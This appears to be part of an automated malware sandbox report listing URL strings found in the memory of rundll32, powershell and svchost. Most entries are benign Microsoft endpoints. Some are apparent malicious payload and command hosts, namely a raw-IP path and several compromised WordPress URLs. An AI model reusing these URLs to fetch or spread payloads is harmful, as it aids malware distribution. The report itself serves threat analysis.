Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp, rundll32.exe, 0000000E.00000003.411786554.0000000003271000.00000004.00000001.sdmp	String found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp	String found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/?
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp	String found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/llc
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp	String found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/w
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.0.194/wp_011_lifestyle/wp-content/uploads/2017/03/2.jpg
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000004.00000003.278015248.0000018A2C0E9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000004.00000003.212412335.0000018A123DE000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micr
Source: svchost.exe, 00000008.00000002.471574815.000001607CA0C000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: powershell.exe, 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp	String found in binary or memory: http://d-cem.com
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://fonts.googleapis.com/css?family=Work
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://html5shim.googlecode.com/svn/trunk/html5.js
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.5.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.5
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.5.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/pmJ/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/includes/demos/lifestyle/demo_style.css?ver=8.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style-woocommerce.css?ver=8.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style.css?ver=8.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.com/xmlrpc.php
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://ketoresetme.comx
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: svchost.exe, 00000008.00000002.471574815.000001607CA0C000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000008.00000002.471574815.000001607CA0C000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0
Source: powershell.exe, 00000004.00000003.278161412.0000018A2C142000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0#
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp	String found in binary or memory: http://rycomputer.com
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/WebPage
Source: svchost.exe, 00000008.00000002.471334775.000001607C850000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.281319093.0000018A14071000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in binary or memory: http://thebestfikrah.com/wp-admin/fOIlVX/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/p/RuMeRPa/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/cc.main.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/jquery.dd.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/style.min.css?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/cargo/bt_elements.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3.2
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/css/jquery.datetimepicker.min.css?v
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/js/jquery.datetimepicker.full.min.j
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/fontawesome.min.css?ver=6.7.4
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/main.min.css?ver=6.7.4
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/wpcargo-style.css?ver=6.7.4
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/js/wpcargo.js?ver=6.7.4
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/gfx/plug.png);
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/dir.hover.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/fancySelect.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/header.misc.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/jquery.magnific-popup.min.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/misc.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/slick.min.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/sliders.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/style.css?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-includes/js/wp-embed.min.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000004.00000002.289110750.0000018A1525D000.00000004.00000001.sdmp	String found in binary or memory: http://wheelcomoving.comx
Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 00000011.00000002.308233755.000001E8C7413000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://anybunny.mobi/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://api.office.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://api.w.org/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://arabysexy.mobi/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://augloop.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://cdn.entity.
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://cortana.ai
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://cr.office.com
Source: powershell.exe, 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp	String found in binary or memory: https://d-cem.com
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in binary or memory: https://d-cem.com/wp-admin/JSLwG1/
Source: powershell.exe, 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp	String found in binary or memory: https://d-cem.comx
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000011.00000002.308278437.000001E8C744E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000011.00000002.308266582.000001E8C7442000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000011.00000002.308266582.000001E8C7442000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://directory.services.
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://dirtyindianporn.info/
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000011.00000002.308278437.000001E8C744E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000011.00000003.286166612.000001E8C7432000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C90
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://freejavporn.mobi/
Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://go-indian.pro/
Source: powershell.exe, 00000004.00000002.289836122.0000018A15796000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://graph.windows.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://graph.windows.net/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://hindiporn.pro/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://hotindianporn.mobi/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
